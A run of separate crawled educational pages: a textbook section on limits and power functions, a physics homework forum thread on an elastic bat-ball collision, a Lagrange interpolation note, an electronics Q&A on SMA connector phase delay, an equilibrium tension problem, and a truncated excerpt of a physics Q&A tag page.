## Section5.1Infinity, limits, and power functions In Section 3.2, we compared the behavior of the exponential functions $p(t) = 2^t$ and $q(t) = (\frac{1}{2})^t\text{,}$ and observed in Figure 3.2.5 that as $t$ increases without bound, $p(t)$ also increases without bound, while $q(t)$ approaches $0$ (while having its value be always positive). We also introduced shorthand notation for describing these phenomena, writing \begin{equation*} p(t) \to \infty \text{ as } t \to \infty \end{equation*} and \begin{equation*} q(t) \to 0 \text{ as } t \to \infty\text{.} \end{equation*} It's important to remember that infinity is not itself a number. We use the “$\infty$” symbol to represent a quantity that gets larger and larger with no bound on its growth. We also know that the concept of infinity plays a key role in understanding the graphical behavior of functions. For instance, we've seen that for a function such as $F(t) = 72 - 45e^{-0.05t}\text{,}$ $F(t) \to 72$ as $t \to \infty\text{,}$ since $e^{-0.05t} \to 0$ as $t$ increases without bound. The function $F$ can be viewed as modeling the temperature of an object that is initially $F(0) = 72-45 = 27$ degrees that eventually warms to $72$ degrees. The line $y = 72$ is thus a horizontal asymptote of the function $F\text{.}$ In Preview 5.1.1, we review some familiar functions and portions of their behavior that involve $\infty\text{.}$ ###### Preview Activity5.1.1. Complete each of the following statements with an appropriate number or the symbols $\infty$ or $-\infty\text{.}$ Do your best to do so without using a graphing utility; instead use your understanding of the function's graph. 1. As $t \to \infty\text{,}$ $e^{-t} \to$ . 2. As $t \to \infty\text{,}$ $\ln(t) \to$ . 3. As $t \to \infty\text{,}$ $e^{t} \to$ . 4. As $t \to 0^+\text{,}$ $e^{-t} \to$ . (When we write $t \to 0^+\text{,}$ this means that we are letting $t$ get closer and closer to $0\text{,}$ but only allowing $t$ to take on positive values.) 5. As $t \to \infty\text{,}$ $35 + 53e^{-0.025t} \to$ . 6. As $t \to \frac{\pi}{2}^-\text{,}$ $\tan(t) \to$. (When we write $t \to \frac{\pi}{2}^-\text{,}$ this means that we are letting $t$ get closer and closer to $\frac{\pi}{2}^-\text{,}$ but only allowing $t$ to take on values that lie to the left of $\frac{\pi}{2}\text{.}$) 7. As $t \to \frac{\pi}{2}^+\text{,}$ $\tan(t) \to$. (When we write $t \to \frac{\pi}{2}^+\text{,}$ this means that we are letting $t$ get closer and closer to $\frac{\pi}{2}^+\text{,}$ but only allowing $t$ to take on values that lie to the right of $\frac{\pi}{2}\text{.}$) ### Subsection5.1.1Limit notation When observing a pattern in the values of a function that correspond to letting the inputs get closer and closer to a fixed value or letting the inputs increase or decrease without bound, we are often interested in the behavior of the function “in the limit”. In either case, we are considering an infinite collection of inputs that are themselves following a pattern, and we ask the question “how can we expect the function's output to behave if we continue?” For instance, we have regularly observed that “as $t \to \infty\text{,}$ $e^{-t} \to 0\text{,}$” which means that by allowing $t$ to get bigger and bigger without bound, we can make $e^{-t}$ get as close to $0$ as we'd like (without $e^{-t}$ ever equalling $0\text{,}$ since $e^{-t}$ is always positive). Similarly, as seen in Figure 5.1.1 and Figure 5.1.2, we can make such observations as $e^t \to \infty$ as $t \to \infty\text{,}$ $\ln(t) \to \infty$ as $t \to \infty\text{,}$ and $\ln(t) \to -\infty$ as $t \to 0^+\text{.}$ We introduce formal limit notation in order to be able to express these patterns even more succinctly. ###### Definition5.1.3. Let $L$ be a real number and $f$ be a function. If we can make the value of $f(t)$ as close to $L$ as we want by letting $t$ increase without bound, we write \begin{equation*} \lim_{t \to \infty} f(t) = L \end{equation*} and say that the limit of $f$ as $t$ increases without bound is $L$. If the value of $f(t)$ increases without bound as $t$ increases without bound, we instead write \begin{equation*} \lim_{t \to \infty} f(t) = \infty\text{.} \end{equation*} Finally, if $f$ doesn't increase without bound, doesn't decrease without bound, and doesn't approach a single value $L$ as $t \to \infty\text{,}$ we say that $f$ does not have a limit as $t \to \infty$. We use limit notation in related, natural ways to express patterns we see in function behavior. For instance, we write $t \to -\infty$ when we let $t$ decrease without bound, and $f(t) \to -\infty$ if $f$ decreases without bound. We can also think about an input value $t$ approaching a value $a$ at which the function $f$ is not defined. As one example, we write \begin{equation*} \lim_{t \to 0^+} \ln(t) = -\infty \end{equation*} because the natural logarithm function decreases without bound as input values get closer and close to $0$ (while always being positive), as seen in Figure 5.1.2. In the situation where $\lim_{t \to \infty} f(t) = L\text{,}$ this tells us that $f$ has a horizontal asymptote at $y = L$ since the function's value approaches this fixed number as $t$ increases without bound. Similarly, if we can say that $\lim_{t \to a} f(t) = \infty\text{,}$ this shows that $f$ has a vertical asymptote at $x = a$ since the function's value increases without bound as inputs approach the fixed number $a\text{.}$ For now, we are going to focus on the long-range behavior of certain basic, familiar functions and work to understand how they behave as the input increases or decreases without bound. Above we've used the input variable $t$ in most of our previous work; going forward, we'll regularly use $x$ as well. ###### Activity5.1.2. Complete the Table 5.1.4 by entering “$\infty\text{,}$” “$-\infty\text{,}$” “$0\text{,}$” or “no limit” to identify how the function behaves as either $x$ increases or decreases without bound. As much as possible, work to decide the behavior without using a graphing utility. ### Subsection5.1.2Power functions To date, we have worked with several families of functions: linear functions of form $y = mx + b\text{,}$ quadratic functions in standard form, $y = ax^2 + bx + c\text{,}$ the sinusoidal (trigonometric) functions $y = a\sin(k(x-b))+c$ or $y = a\cos(k(x-b))+c\text{,}$ transformed exponential functions such as $y = ae^{kx} + c\text{,}$ and transformed logarithmic functions of form $y = a\ln(x) + c\text{.}$ For trigonometric, exponential, and logarithmic functions, it was essential that we first understood the behavior of the basic parent functions $\sin(x)\text{,}$ $\cos(x)\text{,}$ $e^x\text{,}$ and $\ln(x)\text{.}$ In order to build on our prior work with linear and quadratic functions, we now consider basic functions such as $x\text{,}$ $x^2\text{,}$ and additional powers of $x\text{.}$ ###### Definition5.1.5. A function of the form $f(x) = x^p$ where $p$ is any real number is called a power function. We first focus on the case where $p$ is a natural number (that is, a positive whole number). ###### Activity5.1.3. Point your browser to the Desmos worksheet at http://gvsu.edu/s/0zu. In what follows, we explore the behavior of power functions of the form $y = x^n$ where $n \ge 1\text{.}$ 1. Press the “play” button next to the slider labeled “$n\text{.}$” Watch at least two loops of the animation and then discuss the trends that you observe. Write a careful sentence each for at least two different trends. 2. Click the icons next to each of the following 8 functions so that you can see all of $y = x\text{,}$ $y = x^2\text{,}$ $\ldots\text{,}$ $y = x^8$ graphed at once. On the interval $0 \lt x \lt 1\text{,}$ how do the graphs of $x^a$ and $x^b$ compare if $a \lt b\text{?}$ 3. Uncheck the icons on each of the 8 functions to hide their graphs. Click the settings icon to change the domain settings for the axes, and change them to $-10 \le x \le 10$ and $-10,000 \le y \le 10,000\text{.}$ Play the animation through twice and then discuss the trends that you observe. Write a careful sentence each for at least two different trends. 4. Click the icons next to each of the following 8 functions so that you can see all of $y = x\text{,}$ $y = x^2\text{,}$ $\ldots\text{,}$ $y = x^8$ graphed at once. On the interval $x \gt 1\text{,}$ how do the graphs of $x^a$ and $x^b$ compare if $a \lt b\text{?}$ In the situation where the power $p$ is a negative integer (i.e., a negative whole number), power functions behave very differently. This is because of the property of exponents that states \begin{equation*} x^{-n} = \frac{1}{x^n} \end{equation*} so for a power function such as $p(x) = x^{-2}\text{,}$ we can equivalently consider $p(x) = \frac{1}{x^2}\text{.}$ Note well that for these functions, their domain is the set of all real numbers except $x = 0\text{.}$ Like with power functions with positive whole number powers, we want to know how power functions with negative whole number powers behave as $x$ increases without bound, as well as how the functions behave near $x = 0\text{.}$ ###### Activity5.1.4. Point your browser to the Desmos worksheet at http://gvsu.edu/s/0zv. In what follows, we explore the behavior of power functions $y = x^n$ where $n \le -1\text{.}$ 1. Press the “play” button next to the slider labeled “$n\text{.}$” Watch two loops of the animation and then discuss the trends that you observe. Write a careful sentence each for at least two different trends. 2. Click the icons next to each of the following 8 functions so that you can see all of $y = x^{-1}\text{,}$ $y = x^{-2}\text{,}$ $\ldots\text{,}$ $y = x^{-8}$ graphed at once. On the interval $1 \lt x\text{,}$ how do the functions $x^a$ and $x^b$ compare if $a \lt b\text{?}$ (Be careful with negative numbers here: e.g., $-3 \lt -2\text{.}$) 3. How do your answers change on the interval $0 \lt x \lt 1\text{?}$ 4. Uncheck the icons on each of the 8 functions to hide their graphs. Click the settings icon to change the domain settings for the axes, and change them to $-10 \le x \le 10$ and $-10,000 \le y \le 10,000\text{.}$ Play the animation through twice and then discuss the trends that you observe. Write a careful sentence each for at least two different trends. 5. Explain why $\lim_{x \to \infty} \frac{1}{x^n} = 0$ for any choice of $n = 1, 2, \ldots\text{.}$ ### Subsection5.1.3Summary • The notation \begin{equation*} \lim_{x \to \infty} f(x) = L \end{equation*} means that we can make the value of $f(x)$ as close to $L$ as we'd like by letting $x$ be sufficiently large. This indicates that the value of $f$ eventually stops changing much and tends to a single value, and thus $y = L$ is a horizontal asymptote of the function $f\text{.}$ Similarly, the notation \begin{equation*} \lim_{x \to a} f(x) = \infty \end{equation*} means that we can make the value of $f(x)$ as large as we'd like by letting $x$ be sufficiently close, but not equal, to $a\text{.}$ This unbounded behavior of $f$ near a finite value $a$ indicates that $f$ has a vertical asymptote at $x = a\text{.}$ • We summarize some key behavior of familiar basic functions with limits as $x$ increases without bound in Table 5.1.6. Additionally, Table 5.1.7 summarizes some key familiar function behavior where the function's output increases or decreases without bound as $x$ approaches a fixed number not in the function's domain. • A power function is a function of the form $f(x) = x^p$ where $p$ is any real number. For the two cases where $p$ is a positive whole number or a negative whole number, it is straightforward to summarize key trends in power functions' behavior. • If $p = 1, 2, 3, \ldots\text{,}$ then the domain of $f(x) = x^p$ is the set of all real numbers, and as $x \to \infty\text{,}$ $f(x) \to \infty\text{.}$ For the limit as $x \to -\infty\text{,}$ it matters whether $p$ is even or odd: if $p$ is even, $f(x) \to \infty$ as $x \to -\infty\text{;}$ if $p$ is odd, $f(x) \to -\infty$ as $x \to \infty\text{.}$ Informally, all power functions of form $f(x) = x^p$ where $p$ is a positive even number are “U-shaped”, while all power functions of form $f(x) = x^p$ where $p$ is a positive odd number are “chair-shaped”. • If $p = -1, -2, -3, \ldots\text{,}$ then the domain of $f(x) = x^p$ is the set of all real numbers except $x=0\text{,}$ and as $x \to \pm \infty\text{,}$ $f(x) \to 0\text{.}$ This means that each such power function with a negative whole number exponent has a horizontal asymptote of $y = 0\text{.}$ Regardless of the value of $p$ ($p = -1, -2, -3, \ldots$), $\lim_{x \to 0^+} f(x) = \infty\text{.}$ But when we approach $0$ from the negative side, it matters whether $p$ is even or odd: if $p$ is even, $f(x) \to \infty$ as $x \to 0^-\text{;}$ if $p$ is odd, $f(x) \to -\infty$ as $x \to 0^-\text{.}$ Informally, all power functions of form $f(x) = x^p$ where $p$ is a negative odd number look similar to $\frac{1}{x}\text{,}$ while all power functions of form $f(x) = x^p$ where $p$ is a negative even number look similar to $\frac{1}{x^2}\text{.}$ Because the domain of the natural logarithm function is only positive real numbers, it doesn't make sense to even consider this limit. Because the sine function neither increases without bound nor approaches a single value, but rather keeps oscillating through every value between $-1$ and $1$ repeatedly, the sine function does not have a limit as $x \to \infty\text{.}$ ### Exercises5.1.4Exercises ###### 4. We've observed that several different familiar functions grow without bound as $x \to \infty\text{,}$ including $f(x) = \ln(x)\text{,}$ $g(x) = x^2\text{,}$ and $h(x) = e^x\text{.}$ In this exercise, we compare and contrast how these three functions grow. 1. Use a computational device to compute decimal expressions for $f(10)\text{,}$ $g(10)\text{,}$ and $h(10)\text{,}$ as well as $f(100)\text{,}$ $g(100)\text{,}$ and $h(100)\text{.}$ What do you observe? 2. For each of $f\text{,}$ $g\text{,}$ and $h\text{,}$ how large an input is needed in order to ensure that the function's output value is at least $10^{10}\text{?}$ What do these values tell us about how each function grows? 3. Consider the new function $r(x) = \frac{g(x)}{h(x)} = \frac{x^2}{e^x}\text{.}$ Compute $r(10)\text{,}$ $r(100)\text{,}$ and $r(1000)\text{.}$ What do the results suggest about the long-range behavior of $r\text{?}$ What is surprising about this, in light of the fact that both $x^2$ and $e^x$ grow without bound? ###### 5. Consider the familiar graph of $f(x) = \frac{1}{x}\text{,}$ which has a vertical asypmtote at $x = 0$ and a horizontal asymptote at $y = 0\text{,}$ as pictured in Figure 5.1.8. In addition, consider the similarly-shaped function $g$ shown in Figure 5.1.9, which has vertical asymptote $x = -1$ and horizontal asymptote $y = -2\text{.}$ 1. How can we view $g$ as a transformation of $f\text{?}$ Explain, and state how $g$ can be expressed algebraically in terms of $f\text{.}$ 2. Find a formula for $g$ as a function of $x\text{.}$ What is the domain of $g\text{?}$ 3. Explain algebraically (using the form of $g$ from (b)) why $\lim_{x \to \infty} g(x) = -2$ and $\lim_{x \to -1^+} g(x) = \infty\text{.}$ 4. What if a function $h$ (again of a similar shape as $f$) has vertical asymptote $x = 5$ and horizontal asymtote $y = 10\text{.}$ What is a possible formula for $h(x)\text{?}$ 5. Suppose that $r(x) = \frac{1}{x+35} - 27\text{.}$ Without using a graphing utility, how do you expect the graph of $r$ to appear? Does it have a horizontal asymptote? A vertical asymptote? What is its domain? ###### 6. Power functions can have powers that are not whole numbers. For instance, we can consider such functions as $f(x)=x^{2.4}\text{,}$ $g(x)=x^{2.5}\text{,}$ and $h(x)=x^{2.6}\text{.}$ 1. Compare and contrast the graphs of $f\text{,}$ $g\text{,}$ and $h\text{.}$ How are they similar? How are they different? (There is a lot you can discuss here.) 2. Observe that we can think of $f(x) = x^{2.4}$ as $f(x) = x^{24/10} = x^{12/5}\text{.}$ In addition, recall by exponent rules that we can also view $f$ as having the form $f(x) = \sqrt[5]{x^{12}}\text{.}$ Write $g$ and $h$ in similar forms, and explain why $g$ has a different domain than $f$ and $h\text{.}$ 3. How do the graphs of $f\text{,}$ $g\text{,}$ and $h$ compare to the graphs of $y = x^2$ and $y = x^3\text{?}$ Why are these natural functions to use for comparison? 4. Explore similar questions for the graphs of $p(x) = x^{-2.4}\text{,}$ $q(x) = x^{-2.5}\text{,}$ and $r(x) = x^{-2.6}\text{.}$
2022-01-24 11:48:59
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8739688992500305, "perplexity": 189.65666957673875}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-05/segments/1642320304528.78/warc/CC-MAIN-20220124094120-20220124124120-00541.warc.gz"}
https://www.physicsforums.com/threads/bat-and-ball-collison.158586/
# Bat and ball collison A ball and bat, approaching one another each with the same speed of 1.7 m/s, collide. Find the speed of the ball after the collision. (Assume the mass of the bat is very much larger than the mass of the ball, a perfectly elastic collision, and no rotational motion). so i am going to use of energy, and since it is an elatic collison, it will be kenitic energy .5m1v1i^2+.5m2v2i^2=.5m1v1f^2+.5m2v2f^2 since the mass of the bat is much larger than that of the ball, i am going going to use v1i+v2i=v1f+v2f so, if the bat and ball are approching eachother at the same speed i am going to take the ball approching the bat to be negitive, so i have 1.7-1.7=v1f+v2f the answer isn't 0....so this is where i am stuck cristo Staff Emeritus since the mass of the bat is much larger than that of the ball, i am going going to use v1i+v2i=v1f+v2f Could you explain this assumption please? i really don't know! i was just trying to go somewhere....can you help me? Homework Helper (Assume the mass of the bat is very much larger than the mass of the ball, a perfectly elastic collision, and no rotational motion). Does this mean that the collision can be treated like a 'ball vs. wall' collision? i don't know....but i was also thinking that the bat would be taken as 0 and the velociyt of the ball could be 2(1.7) cristo Staff Emeritus congrats, radou. Seems like everyone's turning gold around here! (I know your thinking; you just want more medals! :tongue2:) (sorry for the OT comment Rasine) Doc Al Mentor i don't know....but i was also thinking that the bat would be taken as 0 and the velociyt of the ball could be 2(1.7) Actually, you are on the right track with this thinking. More precisely: In a frame in which the bat is at rest, the ball moves with speed 2x(1.7). In that frame, treating the bat as hugely massive, what's the rebound velocity of the ball? Then convert back to the original frame to find the ball's speed with respect to the ground. Homework Helper i don't know....but i was also thinking that the bat would be taken as 0 and the velociyt of the ball could be 2(1.7) Just to add, if you assume m2 >> m1, (where m2 is the mass of the bat), you can easily verify your result by simply using conservation of momentum, unless I'm missing something here. (I know your thinking; you just want more medals! :tongue2:) (sorry for the OT comment Rasine) Bingo. so if i do that ussing conseravation of energy i will have 0+m2(2*1.7)=0+m2(2*1.7)....right? i am so confused
2022-05-17 07:43:52
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8174534440040588, "perplexity": 794.4388130517764}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-21/segments/1652662517018.29/warc/CC-MAIN-20220517063528-20220517093528-00711.warc.gz"}
https://site.kurtpan.pro/notes/polyinter.html
# Polynomial Interpolation# For a given set of $$k + 1$$ points $$\left(x_{j}, y_{j}\right)$$ with no two $$x_{j}$$ values equal, to find the polynomial of lowest degree that assumes at each value $$x_{j}$$ the corresponding value $$y_{j}$$. ## Lagrange interpolation polynomial# $L(x):=\sum_{j=0}^{k} y_{j} \ell_{j}(x)$ ### Lagrange basis polynomials:# $\begin{split} \ell_{j}(x):=\prod_{\substack{0 \leq m \leq k \\ m \neq j}} \frac{x-x_{m}}{x_{j}-x_{m}} \quad ,j\in [0,k] \end{split}$ Note that: $\forall(i \neq j): \ell_{j}\left(x_{i}\right)=0$ $\ell_{j}\left(x_{j}\right):=1$ It follows that $$y_{j} \ell_{j}\left(x_{j}\right)=y_{j}$$, $$L\left(x_{j}\right)=y_{j}$$
2023-03-27 10:54:59
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9813882112503052, "perplexity": 830.6007628836109}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296948620.60/warc/CC-MAIN-20230327092225-20230327122225-00013.warc.gz"}
https://electronics.stackexchange.com/questions/153621/how-can-i-know-the-phase-shift-or-phase-delay-of-the-sma-connector-and-rf-port
# How can I know the phase shift or phase delay of the SMA connector and RF port? I am now doing a project to measure the phase difference in my circuit. Figure 1 is my circuit. My target is to know the phase difference between the output of the DAC and the input of the ADC. I have known the phase of the output of the DAC, phase shift of the analogue circuit and that the modulator has no phase shift. And the output signals from the DAC is lower than 20kHz. My questions are: what phase shift would the SMA connector cause normally?(SMA connector is 5-1814400-1 from TE connectivity) And How about the RF port? What phase shift would it cause? Does anyone have idea about my questions or idea about how can I solve the problems? (I will try my best to update all information in need) Thank you very much! simulate this circuit – Schematic created using CircuitLab Figure 1. The cable between the SMA and RF port is about 30cm long. But I cant find any more detail about it. The modulator and analogue circuit are connected through fibre and PD. The analogue circuit, SMA connector and MCU are inside one PCB board. • Is the SMA connector part of the modulator or part of the MCU? What cables are connected between the MCU, the connector, and the modulator? – The Photon Feb 11 '15 at 5:15 • @ThePhoton:the SMA connector is part of the PCB board,and the board includes the MCU and the analogue circuit. About the cable, I dont know what kind of it and I know less about the cable. It is about 30cm long. – billyzhao Feb 11 '15 at 5:56 • The 30 cm cable has a much bigger phase effect than the sma connector. – The Photon Feb 11 '15 at 5:59 • Also the modulator also probably has more phase effect than a single connector (doesn't it have connectors itself?) so if you're neglecting its delay, you really shouldn't worry about this connector. – The Photon Feb 11 '15 at 6:01 • @ThePhoton: how serious would the phase effect caused by the cable be? – billyzhao Feb 11 '15 at 6:03 At 20 kHz, the phase shift of the SMA connector is negligible. The length of the signal path is maybe 5 mm. The dielectric constant of the PTFE (Teflon) material in the SMA connector is about 2.0. So the delay through the connector is about 23 ps. That's about 20 microradians of phase delay at 20 kHz. Even at higher frequencies, the delay through the SMA connector is probably quite small compared to the delay through the cable that's connected to the connector, which you've said nothing about. If you were working at a higher frequency where 20 ps made a difference, then you'd have a problem. Because the delay induced by a connector like this depends on the footprint on the PCB where you mount it as well as the construction of the connector itself. And because the two sides of the connector aren't the same type of waveguide. The best way to determine the characteristics of the connector would probably be to build two additional "test coupons" onto your pcb. Each coupon would be a length of trace with a connector on each end. The two traces would be different lengths. By measuring the S-parameters of the two coupons with a network analyzer, you'd have enough information to cancel out the affect of the traces and determine the characteristics of the connector. • Thank you very much! But would the connector or the RF port introduce low-pass effect due to the parasitic capacitance and resistance? I just know less about the material and the construction of connector or RF port. – billyzhao Feb 11 '15 at 6:23 • It's probably about the same as the other things --- way too small to worry about at 20 kHz. To say more, you'd have to tell us something about it besides that it's a "rf port". – The Photon Feb 11 '15 at 6:26 • Sorry for that. I am just learning the construction of the RF port. So by now I can`t tell any more about it. Anyway, Thank you very much! – billyzhao Feb 11 '15 at 6:35 I don't think either the SMA connector or RF port will introduce phase shifts because they are not filtering, amplifying or otherwise processing the signal in any way. They simply pass it along, like a wire. Therefore the phase shift caused by increasing the path length will be practically negligible, but let's calculate it anyway. Your minimum period is 1/20kHz = 50 us. If you assume your signal propagates at the speed of light, and your SMA connector adds ~2 cm to your path, then your signal will take approx 67 ps to travel through the connector. This is 1.333e-6 of your period or a phase shift of approximately 0.00048 degrees. And for signals with frequencies less than 10 kHz, the period will be longer and the phase shift will matter even less. I don't think you have much to worry about. Unless you use really long cables, the phase shift from the DAC output to the ADC input (not due to your analog circuit) will be negligible. • The cable is about 30cm long. So does it matter? And do you mean that RF port also would not introduce serious phase shift? – billyzhao Feb 11 '15 at 6:11
2019-10-20 03:26:45
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5209972262382507, "perplexity": 969.2402393530468}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-43/segments/1570986702077.71/warc/CC-MAIN-20191020024805-20191020052305-00228.warc.gz"}
https://www.clutchprep.com/physics/practice-problems/94131/a-bag-of-cement-weighing-325-n-hangs-in-equilibrium-from-three-wires-as-suggeste
Equilibrium in 2D Video Lessons Concept # Problem: A bag of cement weighing Fg = 325 N hangs in equilibrium from three wires as shown in the figure. Two of the wires make angles θ1 = 60.0° and θ2 = 40.0° with the horizontal. Assuming the system is in equilibrium, find the tensions T1, T2, and T3 in the wires. ###### FREE Expert Solution We're asked for the tension in each of the wires supporting the bag of cement. This is a 2D Equilibrium type of problem with multiple forces in different angles. As usual for equilibrium problems, we'll follow these steps: 1. Draw a free body diagram for each point of interest 2. Set up our equilibrium equations 3. Solve for the target. In two dimensions, we use equilibrium equations in component form: $\overline{){\mathbf{\sum }}{{\mathbit{F}}}_{{\mathbit{x}}}{\mathbf{=}}{\mathbf{0}}\phantom{\rule{0ex}{0ex}}{\mathbf{\sum }}{{\mathbit{F}}}_{{\mathbit{y}}}{\mathbf{=}}{\mathbf{0}}}$ Anytime we're working with forces that aren't at 90° angles to each other, we'll also need some of the equations to convert magnitude-angle notation to components. Magnitude: $\overline{)\mathbf{|}\stackrel{\mathbf{⇀}}{\mathbit{F}}\mathbf{|}{\mathbf{=}}\sqrt{{{\mathbit{F}}_{\mathbit{x}}}^{\mathbf{2}}\mathbf{+}{{\mathbit{F}}_{\mathbit{y}}}^{\mathbf{2}}}}$ Angle: Components of a force: 84% (242 ratings) ###### Problem Details A bag of cement weighing Fg = 325 N hangs in equilibrium from three wires as shown in the figure. Two of the wires make angles θ1 = 60.0° and θ2 = 40.0° with the horizontal. Assuming the system is in equilibrium, find the tensions T1, T2, and T3 in the wires.
2021-09-20 11:53:07
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 2, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7488730549812317, "perplexity": 1362.7642517473632}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-39/segments/1631780057036.89/warc/CC-MAIN-20210920101029-20210920131029-00482.warc.gz"}
http://physics.stackexchange.com/tags/models/hot
Tag Info 49 You are right, the planetary model of the atom does not make sense when one considers the electromagnetic forces involved. The electron in an orbit is accelerating continuously and would thus radiate away its energy and fall into the nucleus. One of the reasons for "inventing" quantum mechanics was exactly this conundrum. The Bohr model was proposed to ... 30 I can tell you why I don't believe in it. I think my reasons are different from most physicists' reasons, however. Regular quantum mechanics implies the existence of quantum computation. If you believe in the difficulty of factoring (and a number of other classical problems), then a deterministic underpinning for quantum mechanics would seem to imply one of ... 17 There is a great paper from the group of Howard Stone on this subject: Wetting of flexible fibre arrays (freely available here, but for some reason I am not allowed to link to it normally: http://211.144.68.84:9998/91keshi/Public/File/34/482-7386/pdf/nature10779.pdf) They specifically study when 2 closely positioned parallel fibers (i.e. hairs) clump ... 15 Let us try to rewrite the equation in approximate form of finite differences: $$\frac{A(x,t+\Delta t)-A(x,t)}{\Delta t} = C_3\frac{A(x+h,t)+A(x-h,t)-2A(x,t)}{h^2} +$$ $$+ C_2 \frac{v(x+h,t)A(x+h,t)-v(x-h,t)A(x-h,t)}{2h} + C_1 A(x,t)+C_0$$ Where $\Delta t$ -- is a time step, and $h$ -- space step. The expression becomes your PDE, in the limit $\Delta t\to0, ... 14 This could have been a comment, but as it actually anwers the question asked in the title, I'll post it as such: As far as I can tell there's no rational reason to dismiss these models out of hand - it's just that quantum mechanics (QM) has set the bar awfully high: So far, there's no experimental evidence that QM is wrong, and no one has come up with a ... 12 There were many models overturned throughout history, I will list some of the most salient ones. I will ignore the ones that predate modern science, the most prominent one being the geocentric model of the solar system, and I will confine myself to wrong ideas that were scientifically accepted as probably true at some point in history. Phlogiston: This is ... 11 Theoretically, yes it should be possible to derive the boiling point of diatomic nitrogen from fundamental forces. In fact, you don't even need to involve the strong force or weak force (or the strong nuclear force, which is sort of different). The strong forces bind the quarks together into nucleons and the nucleons together into nuclei, but they have ... 11 There are thousands of such examples, it is basically all situations in condensed matter physics. You see a lot of regularities that have no explanation. Here's one of the most annoying ones for me: Moseley's law--- you can knock out one of the two electrons most tightly bound to a heavy atom (in the K-shell). This leaves a hole orbiting the nucleus. The ... 10 I can't see how a negatively charged electron can stay in "orbit" around a positively charged nucleus. Even if the electron actually orbits the nucleus, wouldn't that orbit eventually decay? Yes. What you've given is a proof that the classical, planetary model of the atom fails. I can't reconcile the rapidly moving electrons required by the ... 9 Actually a paper recently came out, and highlighted in Popular Science, discussing using fermionic field concepts to model crowd avoidance at Netflix. You can imagine that the same concept could be used to consider in any situation where there are large numbers of people competing for limited preferred items. Update Now that we have a few minutes, ... 9 [ text I had put here is moved to the original question, but I prefer not to erase the comments that were posted here. ] 9 Apologies in advance if the first part of this comes off a bit argumentative, but I think there is an important point about physical 